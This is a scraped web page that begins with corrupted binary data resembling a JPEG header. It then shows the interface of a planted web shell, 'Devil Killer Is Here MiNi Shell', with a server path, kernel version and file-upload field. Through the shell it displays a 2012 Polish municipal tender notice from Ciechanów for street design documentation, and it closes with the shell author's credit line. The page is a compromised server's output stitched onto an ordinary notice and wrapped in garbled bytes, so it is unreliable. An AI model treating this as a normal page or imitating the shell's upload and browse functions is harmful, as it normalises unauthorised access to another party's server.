JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120712/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120712/152373-N-2012.html

<p class="kh_header"><b>Ciechanów: Opracowanie dokumentacji  projektowo - kosztorysowej  wraz z pełnieniem nadzoru autorskiego prze/budowy ulic: 

a)	zadanie 1: ul. Lechonia, Słonimskiego, Gombrowicza, Żeromskiego,
b)	zadanie 2: ul. Klonowa, Lipowa, Świerkowa, Zacisze,
c)	zadanie 3: ul. Morawskiej.</b><br>
<b>Numer ogłoszenia: 152373 - 2012; data zamieszczenia: 12.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Ciechanów reprezentowana przez Prezydenta Miasta Ciechanów , Plac Jana Pawła II 6, 06-400 Ciechanów, woj. mazowieckie, tel. 23 6749200, faks 23 672 29 63.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.umciechanow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji  projektowo - kosztorysowej  wraz z pełnieniem nadzoru autorskiego prze/budowy ulic: 

a)	zadanie 1: ul. Lechonia, Słonimskiego, Gombrowicza, Żeromskiego,
b)	zadanie 2: ul. Klonowa, Lipowa, Świerkowa, Zacisze,
c)	zadanie 3: ul. Morawskiej..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest opracowanie dokumentacji projektowo - kosztorysowej wraz z pełnieniem nadzoru autorskiego na prze/budowę ulic wg zadań:
a)	zadanie 1: ul. Lechonia, Słonimskiego, Gombrowicza, Żeromskiego,
b)	zadanie 2: ul. Klonowa, Lipowa, Świerkowa, Zacisze,
c)	zadanie 3: ul. Morawskiej,

w pełnym zakresie (wynikającym ze stanu istniejącego - warunków terenowych oraz wytycznych szczegółowych zarządcy lub właściciela uzbrojenia) wraz z uzyskaniem stosownych uzgodnień i decyzji (w tym pozwolenia na budowę-przebudowę) oraz zapewnieniem możliwości zaplanowania realizacji inwestycji oraz późniejszego poprawnego funkcjonowania zrealizowanych obiektów-urządzeń.
Opracowanie należy podzielić na zadania (w ramach zadania 1 należy uwzględnić modernizację istniejącego utwardzonego odcinka ul. Żeromskiego) i branże wskazane w siwz

W trakcie realizacji zlecenia Wykonawca powinien zwrócić szczególną uwagę na dokładny opis stosowanych materiałów i technologii tj. wskazanie niezbędnych parametrów technicznych oraz unikanie (niedopuszczalne poza indywidualnymi przypadkami, które muszą być wcześniej zatwierdzone przez Zamawiającego) wskazania znaków towarowych, patentów lub pochodzenia, chyba że jest to uzasadnione specyfiką przedmiotu zamówienia i nie można opisać przedmiotu zamówienia(materiału, technologii, sprzętu) za pomocą dostatecznie dokładnych określeń, a wskazaniu takiemu towarzyszą wyrazy Lub równoważny. W takim przypadku Wykonawca obowiązany jest rozwinąć opis poprzez wskazanie cech  równoważności oraz podanie ich granicznych wartości jakie musza być bezwzględnie spełnione. W przypadku bezzasadnego posługiwania się w dokumentacji projektowej 
nazwami własnymi Wykonawca ponosi pełną odpowiedzialność w tym finansową związaną z nałożeniem korekt itp. do wysokości faktycznie poniesionych szkód przez Zamawiającego.

Wymagane do dokumentacji uzgodnienia i opinie:
a. uzgodnienia Wydziału Inwestycji tut. UM Ciechanów  tel. 23 674 92 13 i 23 674 92 78 dot. koncepcji i stosowania materiałów równoważnych,  
b. uzgodnienia Wydziału Inżynierii Miejskiej i Ochrony Środowiska tut. UM Ciechanów  tel. 23 674 93 06 i 23 674 92 85  dot. rozwiązania sytuacyjnego oraz ewentualnego wycięcia drzew,  
c. uzgodnienia Zespołu ds. Koordynacji  Usytuowania Projektowanych  Sieci Uzbrojenia Terenu  w Ciechanowie wraz z załącznikiem graficznym,
d. uzgodnienie z Zakładem Wodociągów i Kanalizacji  sp. z o.o. Ciechanów, 
e. zaopiniowanie projektu organizacji ruchu przez Powiatowy Zarząd Dróg w Ciechanowie,
f. inne w zależności od potrzeb.

Wszystkie oryginały uzgodnień oraz oryginały wypisów z ewidencji gruntów winny znajdować się w osobnej teczce.

Projekty winny być opracowane w zakresie niezbędnym do uzyskania uzgodnień z właścicielami urządzeń oraz w stopniu szczegółowości umożliwiającym wykonanie robót. 

Projekty usunięcia ewentualnych kolizji z uzbrojeniem inżynieryjnym i zagospodarowaniem terenu:
a. uzgodnienie robót branżowych z właścicielami urządzeń, Urzędem Miasta Ciechanów jw.,
b. uzgodnienie rozwiązania zieleni z Wydziałem Inżynierii Miejskiej i Ochrony Środowiska,
c. opinia Zespołu ds. Koordynacji  Usytuowania Projektowanych  Sieci Uzbrojenia Terenu  w Ciechanowie.

Projekt stałej organizacji ruchu w części opisowej winien zawierać:
a. przedmiot opracowania,
b. zakres opracowania,
c. stan istniejący.

Projekt stałej organizacji ruchu w części rysunkowej winien zawierać:
a. plan orientacyjny,
b. plan sytuacyjny wykonany na podstawie własnej inwentaryzacji projektanta, w skali   1:500; należy pokazać:
- inwentaryzację otoczenia w tym zjazdy,
-	istniejące i projektowane znaki drogowe pionowe i poziome,
-	istniejące i projektowane urządzenia bezpieczeństwa ruchu.

Uzyskanie materiałów do celów projektowych, które są niezbędne do projektowania (w tym mapy do celów projektowych, decyzja o ustaleniu lokalizacji inwestycji celu publicznego lub wycinek miejscowego planu zagospodarowania przestrzennego, warunki techniczne ZWiK  Sp. z o.o., inne w zależności od potrzeb).
Projekt powinien być opracowany zgodnie z obowiązującymi przepisami określonymi w Ustawie Prawo Budowlane z dnia 7 lipca 1994 r. (j. t. Dz. U. z 2010r.  Nr 243  poz. 1623 ze zm.), a w szczególności z rozporządzeniem Ministra Infrastruktury z 2 września 2004 r. (Dz. U. z 2004 r. Nr 202 poz. 2072 z późniejszymi zmianami) i Ustawy Prawo Zamówień Publicznych z dnia 29 stycznia 2004 r. (Dz. U. z 2010 r.  Nr 113  poz. 759 ze zm.) oraz innymi przepisami obowiązującymi odpowiednio w czasie opracowania. 
Kosztorys inwestorski winien być opracowany zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004r. w sprawie metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych  oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz. U. z 2004 r. Nr 130 poz.1389)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.33.00.00-0, 71.35.40.00-4, 71.32.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 07.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonanie minimum jednego zamówienia  polegającego na zaprojektowaniu  ulicy wraz z brakującym uzbrojeniem (np. kanalizacja sanitarna lub deszczowa, oświetlenie uliczne) za kwotę:
a)	zadanie 1 - 100.000,00 zł,
b)	zadanie 2 -   80.000,00 zł,
c)	zadanie 3 -   30.000,00 zł,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponują osobami posiadającymi uprawnienia od min 3 lat (dla każdej funkcji) w specjalnościach odpowiednich do zakresu wykonywanych robót oraz mogącymi wykazać się wykonaniem zadań polegających na opracowaniu:
-	min. 2 zadań polegających na zaprojektowaniu  ulicy wraz z brakującym uzbrojeniem (np. kanalizacja sanitarna lub deszczowa, oświetlenie uliczne, sieć teletechniczna - odpowiednio w min jednej z poniższych branż) - Koordynator zespołu projektantów, 

-	min. 1 zadania polegającego na wykonaniu pomiarów i opracowaniu map d-c projektowych ulic - Geodeta,

-	min. 1 zadania polegającego na zaprojektowaniu ulicy - Projektant robót drogowych,

-	min. 1 zadania polegającego na zaprojektowaniu uzbrojenia ulicy w postaci kanalizacji sanitarnej lub deszczowej - Projektant robót sanitarnych,

-	min. 1 zadania polegającego na zaprojektowaniu uzbrojenia ulicy w postaci oświetlenia ulicznego) - Projektant robót elektrycznych,

-	min. 1 zadania polegającego na zaprojektowaniu uzbrojenia ulicy w postaci sieci teletechnicznej - Projektant robót teletechnicznych,
Zamawiający dopuszcza łączenie funkcji (w tym koordynatora zespołu projektantów) pod warunkiem wykazania się niezbędnymi uprawnieniami dla każdej z łączonych branż.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) formularz oferty-dodatek nr 1 siwz
2)	formularz cenowy - dokument  wypełniony i podpisany przez Wykonawcę. Wzór dokumentu stanowi dodatek nr 9 do siwz, załącznik do oferty nr 9,
3)	podpisany wzór umowy przez upoważnionych przedstawicieli wykonawcy. Wzór dokumentu stanowi dodatek nr 10 do siwz, załącznik do oferty nr 10
4)	w przypadku jeżeli w wykazie osób wykonawca wskazał osoby, którymi  
  będzie dysponował - pisemne zobowiązanie do udostępnienia osób zdolnych do wykonania zamówienia. Wzór dokumentu stanowi dodatek nr 5 do siwz,    załącznik do oferty nr 3a, 
5)	w przypadku jeżeli wykonawca polegał będzie na zasobach innych podmiotów - pisemne zobowiązanie do udostępnienia zasobów wiedzy i doświadczenia niezbędnych do wykonania zamówienia. Wzór dokumentu stanowi dodatek nr 6 do siwz,  załącznik do oferty nr 3b,</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W uzasadnionych przypadkach mających istotny wpływ na realizację umowy, a jednocześnie nie wpływającymi na pogorszenie jakości zamówienia, Zamawiający dopuszcza (przy odpowiednim udokumentowaniu oraz za zgodą obu stron) następując zmiany, tj.:
1)	zmianę osoby, która będzie uczestniczyć w wykonaniu zamówienia w przypadku:
1)	działania siły wyższej (niedyspozycyjność wywołana chorobą lub innymi obowiązkami, zgon) mające bezpośredni wpływ na terminowość wykonania opracowania,
2)	zerwanie stosunków prawnych wywołane brakiem właściwej współpracy osób wykonujących zamówienie,
2)	zmianę terminu realizacji zamówienia w przypadku: 
a)	działania siły wyższej (np. klęski żywiołowe) mające bezpośredni wpływ na terminowość wykonania opracowania,
b)	wystąpienia okoliczności, których strony nie były w stanie przewidzieć, pomimo zachowania należytej staranności,
c)	opóźnienia w uzyskaniu dokumentów źródłowych (decyzja o warunkach zabudowy lub decyzja o lokalizacji inwestycji celu publicznego, decyzja o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia), tj. skrócenie czasu na realizacje zamówienia poniżej 60 dni,
d)	wad i braków dokumentów źródłowych,
3)	zmianę wartości zamówienia w zakresie nadzoru autorskiego w przypadku gdy:
a)	termin rozpoczęcia realizacji (prze/budowy) zadania nastąpi w okresie późniejszym niż 24 miesiące od terminu złożenia oferty,  
b)	termin realizacji (prze/budowy) zadania będzie wykraczał poza okres udzielonej gwarancji.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.umciechanow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> GMINA MIEJSKA CIECHANÓW,  PLAC JANA PAWŁA II 6,  
06-400 CIECHANÓW.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.07.2012 godzina 10:00, miejsce: Oferty należy składać w siedzibie  zamawiającego Biuro Obsługi Interesanta- Biuro Podawcze  stanowisko Nr 7.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Otwarcie ofert nastąpi w siedzibie zamawiającego w dniu 20.07.2012 r. o godz. 10:15, ul. Wodna 1, parter, sala konferencyjna.
2. Zamawiający nie przewiduje w ramach prowadzonego postępowania zawarcia umowy ramowej.
3. Zamawiający nie przewiduje stosowania dynamicznego systemu zakupów..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Opracowanie dokumentacji  projektowo - kosztorysowej  wraz z pełnieniem nadzoru autorskiego prze/budowy ulic: Lechonia, Słonimskiego, Gombrowicza, Żeromskiego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest opracowanie dokumentacji projektowo - kosztorysowej wraz z pełnieniem nadzoru autorskiego na prze/budowę ulic, w pełnym zakresie (wynikającym ze stanu istniejącego - warunków terenowych oraz wytycznych szczegółowych zarządcy lub właściciela uzbrojenia) wraz z uzyskaniem stosownych uzgodnień i decyzji (w tym pozwolenia na prze/budowę ) oraz zapewnieniem możliwości zaplanowania realizacji inwestycji oraz późniejszego poprawnego funkcjonowania zrealizowanych obiektów,urządzeń.Opracowanie należy podzielić na zadania -w ramach zadania 1 należy uwzględnić modernizację istniejącego utwardzonego odcinka ul. Żeromskiego i branże wskazane w siwz. Szczegółowy opis przedmiotu znajduje się w § 1 ust. 2 siwz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.33.00.00-7, 71.33.00.00-0, 71.35.40.00-4, 71.32.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 07.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Opracowanie dokumentacji  projektowo - kosztorysowej  wraz z pełnieniem nadzoru autorskiego prze/budowy ulic: Klonowa, Lipowa, Świerkowa, Zacisze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest opracowanie dokumentacji projektowo - kosztorysowej wraz z pełnieniem nadzoru autorskiego na prze/budowę ulic,  w pełnym zakresie (wynikającym ze stanu istniejącego - warunków terenowych oraz wytycznych szczegółowych zarządcy lub właściciela uzbrojenia) wraz z uzyskaniem stosownych uzgodnień i decyzji (w tym pozwolenia na budowę-przebudowę) oraz zapewnieniem możliwości zaplanowania realizacji inwestycji oraz późniejszego poprawnego funkcjonowania zrealizowanych obiektów,urządzeń. Szczegółowy opis przedmiotu zamówienia znajduje się w § 1 ust. 2 siwz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.33.00.00-0, 71.35.40.00-4, 71.32.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 07.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Opracowanie dokumentacji  projektowo - kosztorysowej  wraz z pełnieniem nadzoru autorskiego prze/budowy ulicy Morawskiej..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest opracowanie dokumentacji projektowo - kosztorysowej wraz z pełnieniem nadzoru autorskiego na prze-budowę ulic,  w pełnym zakresie (wynikającym ze stanu istniejącego - warunków terenowych oraz wytycznych szczegółowych zarządcy lub właściciela uzbrojenia) wraz z uzyskaniem stosownych uzgodnień i decyzji (w tym pozwolenia na prze/budowę) oraz zapewnieniem możliwości zaplanowania realizacji inwestycji oraz późniejszego poprawnego funkcjonowania zrealizowanych obiektów,urządzeń.
Szczegółowy opis przedmiotu znajduje się w § 1 ust. 2 siwz.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.33.00.00-0, 71.35.40.00-4, 71.32.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 07.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com